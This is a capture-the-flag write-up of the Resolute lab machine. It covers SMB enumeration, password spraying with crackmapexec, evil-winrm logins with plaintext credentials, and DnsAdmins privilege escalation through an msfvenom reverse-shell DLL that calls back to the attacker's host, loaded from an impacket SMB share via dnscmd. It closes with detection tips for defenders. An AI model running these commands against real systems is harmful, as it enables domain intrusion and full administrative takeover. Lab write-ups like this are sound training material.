Summary
- Running enum4linux gave usernames .
- Got password for a user marko but turned out to be melanie’s.
- Logged in as melanie using evil-winrm
- Got user.txt flag
- Manual enumeration into directories and got some hidden files
- Got password for user ryan from a file.
- Switched to ryan
- User is in the group of dnsadmin
- Crafting malicious dll file for dll-injection
- Starting the smb server using impacket smbserver.py
- Setting up the path for /serverlevelplugindll to my dll
- Stoping and starting the service dns
- Got root.txt
nmap scan results
Smb was enumerated first using enum4linux. The following users were found and saved them into user.txt
Going through the enum4linux results i also found a password
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
using crackmapexec, brute forcing was done on smb using the collected users and the password
crackmapexec smb 10.10.10.169 -u user.txt -p Welcome123!
Turned out the password was correct for user melanie melanie:Welcome123!
Using smbmap shares were listed but nothing interesting was found.
Remote access was tried on the machine using the creds and it was successfull
Moving into melanie’s Desktop, the user.txt was found
Privilege Escalation
Finding users on the system, quite a number of users were found.
Manually enumerating the directories, an interesting directory was discovered.
Digging further into the directory, a file was found i.e. PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Inside the txt file, credentials of ryan were found
credentials–> ryan:Serv3r4Admin4cc123!
I used the cred to remote login using evil-winrm and it was successful
whoami /all was run and interestingly ryan was a member of DnsAdmins Another way to check the group of a user was
(Get-ADUser userName –Properties MemberOf).MemberOf or net user userName /domain
After some googling, a blog was found that explained how to escalate privilege using members of dnsadmins here
Therefore a dll payload was created using msfvenom using the below command
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4443 --platform=windows -f dll > privesc.dll
Then hosted the file using smb, hosting it with smb was chosen because windows supports UNC paths and samba shares by default in most cases. Also, there are times when the victim’s AV or defender may delete the payload if uploaded.
Created the smbserver using impackets smbserver.py as follows:
sudo smbserver.py SHARE .
Testing was done to see if the victim machine could access the share and it was successful
Next, the below command was used on powershell to inject the generated payload
dnscmd.exe /config /serverlevelplugindll \\10.10.14.4\SHARE\privesc.dll
Then finally, restarting the dns server
And we got administrator shell
Root.txt
For the BlueTeamers there are some ways to detect or prevent dnsadmin privesc
- To prevent the attack, audit ACL for write privilege to DNS server object and membership of DNSAdmins group.
- Indicators like DNS service restart and couple of log entries:
- DNS Server Log Event ID 150 for failure and 770 for success
- Monitoring changes to HKLM:\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll will also help.
I Hope you found this helpful.
